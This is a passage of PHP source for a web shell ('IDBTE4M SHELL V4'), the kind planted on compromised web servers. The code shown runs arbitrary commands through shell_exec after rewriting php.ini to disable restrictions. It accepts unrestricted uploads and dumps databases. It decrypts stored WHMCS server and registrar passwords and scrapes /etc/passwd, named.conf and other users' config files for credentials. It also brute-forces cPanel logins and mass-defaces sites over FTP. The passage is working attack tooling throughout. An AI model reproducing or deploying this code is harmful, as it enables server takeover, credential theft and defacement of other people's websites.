+vv8X";
523$jumper="fVJtb5swEP4rF4Rko7Ka7WMCpFLVfp20fWwrarA9PAFGtlmXVfvvuwtN1mjShEDmebl77kB3vYOkjLIdNHSDDKF6TLpRte7nY1KX0eOtoHNDmOWE1CdEkx3wNIxQgZ1s801HzoI0uhmd0iyDqoIigz2sEuaMYVtQVvPkznvnt/D1JEb681SKqGp8eHpQjLpU9sc5y3d5kJREIFgn2Q6Cjk20o24GO9rIC4Ru0hnFLwrrGTfriTOhYydWkOXMMxRZA3zzJszglRIBTx4+PMExFmzh1i1qeo7wRUsF7yr8m5By/IZ0XlpsKb2XB45IugTtwwXSuclcABbfih289HbQfGO0M/yUKXvFlUVPQ+BOwxlfo6Ozho9FQarZURfU4oGTJ2dbdgowyZEWG5YWiZUtcrKQQFn/iz6K6N2oBbs+O66ZwGkG2zV9HAfB1qb8b8UNuhhlJNyGxuOSaBf8WJOI45DNvIR+tYX87MbW71nslK82WiNdqb26orNxWLfr4a0CyLAOheU1/ans4d4tk4LNE5QSeq9NlewP1cU4l6Mk9X9IUQpZl62vGTXf138A";
524?>
525<html><head><link rel="SHORTCUT ICON" href="http://zonehmirrors.org/defaced/2016/11/11/alignlifewauwatosa.com/kefiex.yu.tl/files/bnx.png"><title>-=[ IDBTE4M SHELL V4 ]=-</title>
526<script type="text/javascript">
527function tukar(lama,baru){
528 document.getElementById(lama).style.display = 'none';
529 document.getElementById(baru).style.display = 'block';
530}
531</script>
532<style type="text/css">
533body{
534 background:#000000;;
535}
536a {
537text-decoration:none;
538}
539a:hover{
540border-bottom:1px solid #00ff00;
541}
542*{
543 font-size:11px;
544 font-family:Tahoma,Verdana,Arial;
545 color:#00ff00;
546}
547#menu{
548 background:#111111;
549 margin:8px 2px 4px 2px;
550}
551#menu a{
552 padding:4px 18px;
553 margin:0;
554 background:#222222;
555 text-decoration:none;
556 letter-spacing:2px;
557 -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
558}
559#menu a:hover{
560 background:#191919;
561 border-bottom:1px solid #333333;
562 border-top:1px solid #333333;
563}
564.tabnet{
565 margin:15px auto 0 auto;
566 border: 1px solid #333333;
567}
568.main {
569 width:100%;
570}
571.gaya {
572 color: #00ff00;
573}
574.inputz{
575 background:#111111;
576 border:0;
577 padding:2px;
578 border-bottom:1px solid #222222;
579 border-top:1px solid #222222;
580}
581.inputzbut{
582 background:#111111;
583 color:#00ff00;
584 margin:0 4px;
585 border:1px solid #444444;
586
587}
588.inputz:hover, .inputzbut:hover{
589 border-bottom:1px solid #00ff00;
590 border-top:1px solid #00ff00;
591}
592.output {
593 margin:auto;
594 border:1px solid #00ff00;
595 width:100%;
596 height:400px;
597 background:#000000;
598 padding:0 2px;
599}
600.cmdbox{
601 width:100%;
602}
603.head_info{
604 padding: 0 4px;
605}
606.jaya{ font-family: ;}
607
608.b374k{
609 font-size:30px;
610 padding:0;
611 color:#444444;
612}
613.b374k_tbl{
614 text-align:center;
615 margin:0 4px 0 0;
616 padding:0 4px 0 0;
617 border-right:1px solid #333333;
618}
619.phpinfo table{
620 width:100%;
621 padding:0 0 0 0;
622}
623.phpinfo td{
624 background:#111111;
625 color:#cccccc;
626padding:6px 8px;;
627}
628.phpinfo th, th{
629 background:#191919;
630 border-bottom:1px solid #333333;
631font-weight:normal;
632}
633.phpinfo h2, .phpinfo h2 a{
634 text-align:center;
635 font-size:16px;
636 padding:0;
637 margin:30px 0 0 0;
638 background:#222222;
639 padding:4px 0;
640}
641.explore{
642width:100%;
643}
644.explore a {
645text-decoration:none;
646}
647.explore td{
648border-bottom:1px solid #333333;
649padding:0 8px;
650line-height:24px;
651}
652.explore th{
653padding:3px 8px;
654font-weight:normal;
655}
656.explore th:hover , .phpinfo th:hover{
657border-bottom:1px solid #00ff00;
658}
659.explore tr:hover{
660background:#111111;
661}
662.viewfile{
663background:#EDECEB;
664color:#000000;
665margin:4px 2px;
666padding:8px;
667}
668.sembunyi{
669display:none;
670padding:0;margin:0;
671}
672
673</style>
674</head>
675<body onLoad="document.getElementById('cmd').focus();">
676<div class="main">
677<!-- head info start here -->
678<div class="head_info">
679<table ><tr>
680<td><table class="b374k_tbl"><tr><td><a href="?<?php echo "y=".$pwd; ?>&x=about"><span class="b374k"><img src="http://zonehmirrors.org/defaced/2016/11/11/alignlifewauwatosa.com/kefiex.yu.tl/files/bnx.png" height="150" width="250" /></span></a></td></tr><br>
681<div id="menu" align="left">
682<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">
683<td><!-- onMouseOver="this.focus();" --><nobr><input type="file" name="file" class="inputz" size="50">
684<input name="_upl" type="submit" id="_upl" class="inputz" value="Upload"></form></div></b></td></tr></table></td>
685<td><?php echo $buff; ?></td>
686</td>
687</tr>
688</tr></table>
689</div>
690<div id="menu" align="center">
691
692<font color=red size=2 face="TAHOMA">
693<p align="center" dir="ltr"> <hr><center>
694<font color="red" font size=3 > | <font color="white" font size=3 >
695<a href="?" style="text-decoration: none">
696Home </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
697<a href="?idb=sql" style="text-decoration: none">
698SQL </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
699<a href="?idb=cp" style="text-decoration: none">
700Cpanel Cracker </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
701<a href="?idb=jump" style="text-decoration: none">
702Jumping </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
703<a href="?x=maling" style="text-decoration: none">
704Maling Script </a> <font color="white" font size=3 ></font>
705<font color="red" font size=3 > |</font>
706<br><hr><center>
707<font color="red" font size=3 > |</font>
708<a href="?idb=auto" style="text-decoration: none">
709Auto Wget </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
710<a href="?x=php" style="text-decoration: none">
711Shell </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
712<a href="?idb=config" style="text-decoration: none">
713Config Grabber </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
714<a href="?idb=wp2" style="text-decoration: none">
715Config Auto Get </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
716<a href="?idb=zonh" style="text-decoration: none">
717Zon-H </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
718<a href="?idb=mass" style="text-decoration: none">
719Mass Deface </a> <font color="white" font size=3 ></font>
720<font color="red" font size=3 >|</font>
721<hr>
722<font color="red" font size=3 >|</font>
723<a href="?idb=brute" style="text-decoration: none">
724Cp Brute </a> <font color="white" font size=3 ></font>
725<font color="red" font size=3 >|</font>
726<a href="?idb=finder" style="text-decoration: none">
727Admin Finder </a> <font color="white" font size=3 ></font>
728<font color="red" font size=3 > |</font>
729<a href="?idb=symlink" style="text-decoration: none">
730Symlink </a> <font color="white" font size=3 ></font>
731<font color="red" font size=3 > |</font>
732<a href="?idb=dump" style="text-decoration: none">
733Db Dump </a> <font color="white" font size=3 ></font>
734<font color="red" font size=3 > |</font>
735<a href="?idb=has" style="text-decoration: none">
736Password Hash </a> <font color="white" font size=3 ></font>
737<font color="red" font size=3 > |</font>
738<a href="?idb=whmcs" style="text-decoration: none">
739Whmcs Decoder </a> <font color="white" font size=3 ></font>
740<font color="red" font size=3 > |</font>
741<a href="?idb=wpp" style="text-decoration: none">
742Wp Mass </a> <font color="white" font size=3 ></font>
743<font color="red" font size=3 > |</font>
744<hr>
745<font color="red" font size=3 >|</font>
746<a href="?idb=jomla" style="text-decoration: none">
747Jomla Mass </a> <font color="white" font size=3 ></font>
748<font color="red" font size=3 > |</font>
749<a href="?idb=wpmas" style="text-decoration: none">
750Wp Mass Manual </a> <font color="white" font size=3 ></font>
751<font color="red" font size=3 > |</font>
752<a href="?idb=sken" style="text-decoration: none">
753Scan All Dir In Server </a> <font color="white" font size=3 ></font>
754<font color="red" font size=3 > |</font>
755<a href="?idb=cgi" style="text-decoration: none">
756Cgi Shell </a> <font color="white" font size=3 ></font>
757<font color="red" font size=3 > |</font>
758<a href="?idb=passwd" style="text-decoration: none">
759Symlink 2 </a> <font color="white" font size=3 ></font>
760<font color="red" font size=3 > |</font>
761<a href="?idb=cpanel" style="text-decoration: none">
762Cpanel Brute 2</a> <font color="white" font size=3 ></font>
763<hr>
764<font color="red" font size=3 > |</font>
765<a href="?idb=auto_wp" style="text-decoration: none">
766Wp Change Title </a> <font color="white" font size=3 ></font>
767<font color="red" font size=3 > |</font>
768<a href="?idb=cpftp_auto" style="text-decoration: none">
769Mass FTP</a> <font color="white" font size=3 ></font>
770<font color="red" font size=3 > |</font>
771<a href="?idb=smtp" style="text-decoration: none">
772Smtp Grabber </a> <font color="white" font size=3 ></font>
773<font color="red" font size=3 > |</font>
774<a href="?idb=auto_edit_user" style="text-decoration: none">
775WP Change User</a> <font color="white" font size=3 ></font>
776<font color="red" font size=3 > |</font>
777<a href="?do=adminer" style="text-decoration: none">
778Adminer </a> <font color="white" font size=3 ></font>
779<font color="red" font size=3 > |</font>
780</td><hr></center>
781</tr></table></div>
782
783<div id="viewfile" align="left">
784<form method="post">
785<td><nobr><b>CMD</b></nobr></td>
786<td><!-- onMouseOver="this.focus();" --><nobr><input id="cmd" class="inputz" type="text" name="cmd" style="width:300px;" value="" />
787<input class="inputzbut" type="submit" value=" >> " style="width:50px;" />
788</form>
789
790
791<?php
792if( $_POST['_upl'] == "Upload" ) {
793 if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
794 else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
795}
796?>
797<?php
798/*******************************************\
799| CMD linux DTT 2014
800
801\*******************************************/
802$x0f = "fopen";
803$x10 = "fwrite";
804$x11 = "function_exists";
805$x12 = "shell_exec";
806if (isset($_POST['cmd'])) {
807 $x0b = $x0f('php.ini', 'w');
808 $x0c = " disable_functions=none ";
809 $x10($x0b, $x0c);
810 if ($x11('shell_exec')) {
811 $x0d = $_POST['cmd'];
812 $x0e = $x12("$x0d");
813 echo "<div id=result>";
814 echo "<span class=Y><pre>$x0e</pre></span";
815 }
816 echo "</div>";
817}
818?>
819<center>
820<div id="menu" align="center">
821<?php
822if (isset($_GET['idb']) && ($_GET['idb'] == 'dump')) { ?>
823<form action="?idb=dump" method="post">
824<?php
825echo $head.'<p align="center">';
826echo '
827<table width=371 class=tabnet >
828<tr><th colspan="2">Database Dump</th></tr>
829<tr>
830 <td>Server </td>
831 <td><input class="inputz" type=text name=server size=52></td></tr><tr>
832 <td>Username</td>
833 <td><input class="inputz" type=text name=username size=52></td></tr><tr>
834 <td>Password</td>
835 <td><input class="inputz" type=text name=password size=52></td></tr><tr>
836 <td>DataBase Name</td>
837 <td><input class="inputz" type=text name=dbname size=52></td></tr>
838 <tr>
839 <td>DB Type </td>
840 <td><form method=post action="'.$me.'">
841 <select class="inputz" name=method>
842 <option value="gzip">Gzip</option>
843 <option value="sql">Sql</option>
844 </select>
845 <input class="inputzbut" type=submit value=" Dump! " ></td></tr>
846 </form></center></table>';
847if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
848$date = date("Y-m-d");
849$dbserver = $_POST['server'];
850$dbuser = $_POST['username'];
851$dbpass = $_POST['password'];
852$dbname = $_POST['dbname'];
853$file = "Dump-$dbname-$date";
854$method = $_POST['method'];
855if ($method=='sql'){
856$file="Dump-$dbname-$date.sql";
857$fp=fopen($file,"w");
858}else{
859$file="Dump-$dbname-$date.sql.gz";
860$fp = gzopen($file,"w");
861}
862function write($data) {
863global $fp;
864if ($_POST['method']=='ssql'){
865fwrite($fp,$data);
866}else{
867gzwrite($fp, $data);
868}}
869mysql_connect ($dbserver, $dbuser, $dbpass);
870mysql_select_db($dbname);
871$tables = mysql_query ("SHOW TABLES");
872while ($i = mysql_fetch_array($tables)) {
873 $i = $i['Tables_in_'.$dbname];
874 $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
875 write($create['Create Table'].";\n\n");
876 $sql = mysql_query ("SELECT * FROM ".$i);
877 if (mysql_num_rows($sql)) {
878 while ($row = mysql_fetch_row($sql)) {
879 foreach ($row as $j => $k) {
880 $row[$j] = "'".mysql_escape_string($k)."'";
881 }
882 write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
883 }
884 }
885}
886if ($method=='ssql'){
887fclose ($fp);
888}else{
889gzclose($fp);}
890header("Content-Disposition: attachment; filename=" . $file);
891header("Content-Type: application/download");
892header("Content-Length: " . filesize($file));
893flush();
894
895$fp = fopen($file, "r");
896while (!feof($fp))
897{
898 echo fread($fp, 65536);
899 flush();
900}
901fclose($fp);
902}
903
904}
905elseif(isset($_GET['idb']) && ($_GET['idb'] == 'has'))
906 {
907$submit= $_POST['enter'];
908if (isset($submit)) {
909$pass = $_POST['password']; // password
910$salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
911$hash = md5($pass); // md5 hash #1
912$md4 = hash("md4",$pass);
913$hash_md5 = md5($salt.$pass); // md5 hash with salt #2
914$hash_md5_double = md5(sha1($salt.$pass)); // md5 hash with salt & sha1 #3
915$hash1 = sha1($pass); // sha1 hash #4
916$sha256 = hash("sha256",$text);
917$hash1_sha1 = sha1($salt.$pass); // sha1 hash with salt #5
918$hash1_sha1_double = sha1(md5($salt.$pass)); // sha1 hash with salt & md5 #6
919}
920echo '<form action="" method="post"><b><table class=tabnet>';
921echo '<tr><th colspan="2">Password Hash</th></center></tr>';
922echo '<tr><td><b>Enter the word you want to encrypt:</b></td>';
923echo '<td><input class="inputz" type="text" name="password" size="40" />';
924echo '<input class="inputzbut" type="submit" name="enter" value="hash" />';
925echo '</td></tr><br>';
926echo '<tr><th colspan="2">Hash Result</th></center></tr>';
927echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value='.$pass.'></td></tr><br><br>';
928echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value='.$hash.'></td></tr><br><br>';
929echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value='.$md4.'></td></tr><br><br>';
930echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value='.$hash_md5.'></td></tr><br><br>';
931echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value='.$hash_md5_double.'></td></tr><br><br>';
932echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value='.$hash1.'></td></tr><br><br>';
933echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value='.$sha256.'></td></tr><br><br>';
934echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value='.$hash1_sha1.'></td></tr><br><br>';
935echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value='.$hash1_sha1_double.'></td></tr><br><br></table>';
936}
937elseif(isset($_GET['idb']) && ($_GET['idb'] == 'whmcs'))
938{
939?>
940<form action="?y=<?php echo $pwd; ?>&idb=whmcs" method="post">
941
942<?php
943
944function decrypt ($string,$cc_encryption_hash)
945{
946 $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
947 $hash_key = _hash ($key);
948 $hash_length = strlen ($hash_key);
949 $string = base64_decode ($string);
950 $tmp_iv = substr ($string, 0, $hash_length);
951 $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
952 $iv = $out = '';
953 $c = 0;
954 while ($c < $hash_length)
955 {
956 $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
957 ++$c;
958 }
959 $key = $iv;
960 $c = 0;
961 while ($c < strlen ($string))
962 {
963 if (($c != 0 AND $c % $hash_length == 0))
964 {
965 $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
966 }
967 $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
968 ++$c;
969 }
970 return $out;
971}
972
973function _hash ($string)
974{
975 if (function_exists ('sha1'))
976 {
977 $hash = sha1 ($string);
978 }
979 else
980 {
981 $hash = md5 ($string);
982 }
983 $out = '';
984 $c = 0;
985 while ($c < strlen ($hash))
986 {
987 $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
988 $c += 2;
989 }
990 return $out;
991}
992
993echo "
994<br><center><font size='5' color='#FF0000'><b>--==[ WHMCS Decoder ]==--</b></font></center>
995<center>
996<br>
997
998<FORM action='' method='post'>
999<input type='hidden' name='form_action' value='2'>
1000<br>
1001<table class=tabnet style=width:320px;padding:0 1px;>
1002<tr><th colspan=2>WHMCS Decoder</th></tr>
1003<tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
1004<tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
1005<tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
1006<tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
1007<tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
1008<td> <INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:' value='Submit' name='Submit'></td>
1009</table>
1010</FORM>
1011</center>
1012";
1013
1014 if($_POST['form_action'] == 2 )
1015 {
1016 //include($file);
1017 $db_host=($_POST['db_host']);
1018 $db_username=($_POST['db_username']);
1019 $db_password=($_POST['db_password']);
1020 $db_name=($_POST['db_name']);
1021 $cc_encryption_hash=($_POST['cc_encryption_hash']);
1022
1023
1024
1025 $link=mysql_connect($db_host,$db_username,$db_password) ;
1026 mysql_select_db($db_name,$link) ;
1027$query = mysql_query("SELECT * FROM tblservers");
1028while($v = mysql_fetch_array($query)) {
1029$ipaddress = $v['ipaddress'];
1030$username = $v['username'];
1031$type = $v['type'];
1032$active = $v['active'];
1033$hostname = $v['hostname'];
1034echo("<center><table border='1'>");
1035$password = decrypt ($v['password'], $cc_encryption_hash);
1036echo("<tr><td>Type</td><td>$type</td></tr>");
1037echo("<tr><td>Active</td><td>$active</td></tr>");
1038echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
1039echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
1040echo("<tr><td>Username</td><td>$username</td></tr>");
1041echo("<tr><td>Password</td><td>$password</td></tr>");
1042
1043echo "</table><br><br></center>";
1044}
1045
1046 $link=mysql_connect($db_host,$db_username,$db_password) ;
1047 mysql_select_db($db_name,$link) ;
1048$query = mysql_query("SELECT * FROM tblregistrars");
1049echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
1050echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
1051while($v = mysql_fetch_array($query)) {
1052$registrar = $v['registrar'];
1053$setting = $v['setting'];
1054$value = decrypt ($v['value'], $cc_encryption_hash);
1055if ($value=="") {
1056$value=0;
1057}
1058$password = decrypt ($v['password'], $cc_encryption_hash);
1059echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
1060}
1061}
1062}
1063
1064?>
1065<?php
1066if (isset($_GET['idb']) && ($_GET['idb'] == 'juancok')) {
1067function save($pesan) {
1068$f = fopen("asune.txt", "a+");
1069fwrite($f, "$pesan\n");
1070fclose($f);
1071}
1072@ini_set('display_errors',0);
1073function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
1074 $ar0=explode($marqueurDebutLien, $text);
1075 $ar1=explode($marqueurFinLien, $ar0[$i]);
1076 return trim($ar1[0]);
1077}
1078
1079echo '<html><head>
1080<title>Automatic cPanel Finder/Cracker | 3xp1r3 Cyber Army</title>
1081<meta content="text/html; charset=utf-8">
1082<meta name="keywords" content="" />
1083<meta name="description" content="" />
1084<meta name="author" content="rEd X" />
1085<link rel="SHORTCUT ICON" href="http://us.yimg.com/i/mesg/emoticons7/61.gif">
1086<link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
1087<link rel="stylesheet" type="text/css" href="http://faisalahmed.me/wp-content/assets/css/1.css">
1088</head><body>';
1089echo "<center>";
1090$d0mains = @file('/etc/named.conf');
1091$domains = scandir("/var/named");
1092
1093if ($domains or $d0mains)
1094{
1095 $domains = scandir("/var/named");
1096 if($domains) {
1097echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
1098$count=1;
1099$dc = 0;
1100$list = scandir("/var/named");
1101foreach($list as $domain){
1102if(strpos($domain,".db")){
1103$domain = str_replace('.db','',$domain);
1104$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1105$dirz = '/home/'.$owner['name'].'/backupwordpress';
1106$path = getcwd();
1107
1108if (is_readable($dirz)) {
1109copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
1110$p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
1111$password=entre2v2($p,'password="','"');
1112echo "<tr><td>".$count++."</td><td><a href='/idbv2.php?y=/".$dirz."' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='http://".$domain."/yarabb.php' target='_blank'>Click Here</a></td></tr>";
1113save("http://".$domain."/yarabb.php\n");
1114$dc++;
1115}
1116
1117}
1118}
1119echo '</table>';
1120$total = $dc;
1121echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
1122echo '</center>';
1123}else{
1124$d0mains = @file('/etc/named.conf');
1125 if($d0mains) {
1126echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
1127$count=1;
1128$dc = 0;
1129$mck = array();
1130foreach($d0mains as $d0main){
1131 if(@eregi('zone',$d0main)){
1132 preg_match_all('#zone "(.*)"#',$d0main,$domain);
1133 flush();
1134 if(strlen(trim($domain[1][0])) >2){
1135 $mck[] = $domain[1][0];
1136 }
1137 }
1138}
1139$mck = array_unique($mck);
1140$usr = array();
1141$dmn = array();
1142foreach($mck as $o) {
1143 $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
1144 $usr[] = $infos['name'];
1145 $dmn[] = $o;
1146}
1147array_multisort($usr,$dmn);
1148$dt = file('/etc/passwd');
1149$passwd = array();
1150foreach($dt as $d) {
1151 $r = explode(':',$d);
1152 if(strpos($r[5],'home')) {
1153 $passwd[$r[0]] = $r[5];
1154 }
1155}
1156$l=0;
1157$j=1;
1158foreach($usr as $r) {
1159$dirz = '/home/'.$r.'/backupwordpress';
1160$path = getcwd();
1161if (is_readable($dirz)) {
1162copy($dirz, ''.$path.'/'.$r.'.txt');
1163$p=file_get_contents(''.$path.'/'.$r.'.txt');
1164$password=entre2v2($p,'password="','"');
1165echo "<tr><td>".$count++."</td><td><a target='_blank' href=/indo.php?dir=".$dirz.'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
1166$dc++;
1167 flush();
1168 $l=$l?0:1;
1169 $j++;
1170 }
1171 }
1172 }
1173echo '</table>';
1174$total = $dc;
1175echo '<br><div class="result">Total = '.$total.'</h3><br />';
1176echo '</center>';
1177
1178}
1179}else{
1180}
1181}
1182echo "</body></html>";
1183?>
1184<?php
1185if (isset($_GET['idb']) && ($_GET['idb'] == 'cpanel')) {
1186 if($_POST['crack']) {
1187 $usercp = explode("\r\n", $_POST['user_cp']);
1188 $passcp = explode("\r\n", $_POST['pass_cp']);
1189 $i = 0;
1190 foreach($usercp as $ucp) {
1191 foreach($passcp as $pcp) {
1192 if(@mysql_connect('localhost', $ucp, $pcp)) {
1193 if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1194 } else {
1195 $_SESSION[$ucp] = "1";
1196 $_SESSION[$pcp] = "1";
1197 if($ucp == '' || $pcp == '') {
1198
1199 } else {
1200 $i++;
1201 if(function_exists('posix_getpwuid')) {
1202 $domain_cp = file_get_contents("/etc/named.conf");
1203 if($domain_cp == '') {
1204 $dom = "<font color=red>gabisa ambil nama domain nya</font>";
1205 } else {
1206 preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1207 foreach($domains_cp[1] as $dj) {
1208 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1209 $user_cp_url = $user_cp_url['name'];
1210 if($user_cp_url == $ucp) {
1211 $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
1212 break;
1213 }
1214 }
1215 }
1216 } else {
1217 $dom = "<font color=red>function is Disable by system</font>";
1218 }
1219 echo "USA | CPANEL | FRESH AND VALID 100% | http://$dom:2082 | $ucp | $pcp | 6.00<br>";
1220 }
1221 }
1222 }
1223 }
1224 }
1225 if($i == 0) {
1226 } else {
1227 echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
1228 }
1229 } else {
1230 echo "<center>
1231 <form method='post'>
1232 USER: <br>
1233 <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1234 $_usercp = fopen("/etc/passwd","r");
1235 while($getu = fgets($_usercp)) {
1236 if($getu == '' || !$_usercp) {
1237 echo "<font color=red>Can't read /etc/passwd</font>";
1238 } else {
1239 preg_match_all("/(.*?):x:/", $getu, $u);
1240 foreach($u[1] as $user_cp) {
1241 if(is_dir("/home/$user_cp/public_html")) {
1242 echo "$user_cp\n";
1243 }
1244 }
1245 }
1246 }
1247 echo "</textarea><br>
1248 PASS: <br>
1249 <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1250 function cp_pass($asui) {
1251 $pass = "";
1252 $dira = scandir($asui);
1253 foreach($dira as $dirb) {
1254 if(!is_file("$dir/$dirb")) continue;
1255 $ambil = file_get_contents("$dir/$dirb");
1256 if(preg_match("/WordPress/", $ambil)) {
1257 $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1258 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1259 $pass .= ambilkata($ambil,"password = '","'")."\n";
1260 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1261 $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1262 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1263 $pass .= ambilkata($ambil,'password = "','"')."\n";
1264 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1265 $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1266 } elseif(preg_match("/^[client]$/", $ambil)) {
1267 preg_match("/password=(.*?)/", $ambil, $pass1);
1268 if(preg_match('/"/', $pass1[1])) {
1269 $pass1[1] = str_replace('"', "", $pass1[1]);
1270 $pass .= $pass1[1]."\n";
1271 } else {
1272 $pass .= $pass1[1]."\n";
1273 }
1274 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1275 $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1276 }
1277 }
1278 echo $pass;
1279 }
1280 $cp_pass = cp_pass($asui);
1281 echo $cp_pass;
1282 echo "</textarea><br>
1283 <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1284 </form>
1285 <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1286 }
1287} elseif($_GET['idb'] == 'cpftp_auto') {
1288 if($_POST['crack']) {
1289 $usercp = explode("\r\n", $_POST['user_cp']);
1290 $passcp = explode("\r\n", $_POST['pass_cp']);
1291 $i = 0;
1292 foreach($usercp as $ucp) {
1293 foreach($passcp as $pcp) {
1294 if(@mysql_connect('localhost', $ucp, $pcp)) {
1295 if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1296 } else {
1297 $_SESSION[$ucp] = "1";
1298 $_SESSION[$pcp] = "1";
1299 if($ucp == '' || $pcp == '') {
1300 //
1301 } else {
1302 echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
1303 $ftp_conn = ftp_connect($ip);
1304 $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
1305 if((!$ftp_login) || (!$ftp_conn)) {
1306 echo "[+] <font color=red>Login Gagal</font><br><br>";
1307 } else {
1308 echo "[+] <font color=lime>Login Sukses</font><br>";
1309 $fi = htmlspecialchars($_POST['file_deface']);
1310 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
1311 if($deface) {
1312 $i++;
1313 echo "[+] <font color=lime>Deface Sukses</font><br>";
1314 if(function_exists('posix_getpwuid')) {
1315 $domain_cp = file_get_contents("/etc/named.conf");
1316 if($domain_cp == '') {
1317 echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1318 } else {
1319 preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1320 foreach($domains_cp[1] as $dj) {
1321 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1322 $user_cp_url = $user_cp_url['name'];
1323 if($user_cp_url == $ucp) {
1324 echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
1325 break;
1326 }
1327 }
1328 }
1329 } else {
1330 echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1331 }
1332 } else {
1333 echo "[-] <font color=red>Deface Gagal</font><br><br>";
1334 }
1335 }
1336 //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
1337 }
1338 }
1339 }
1340 }
1341 }
1342 if($i == 0) {
1343 } else {
1344 echo "<br>sukses deface ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
1345 }
1346 } else {
1347 echo "<center>
1348 <form method='post'>
1349 Filename: <br>
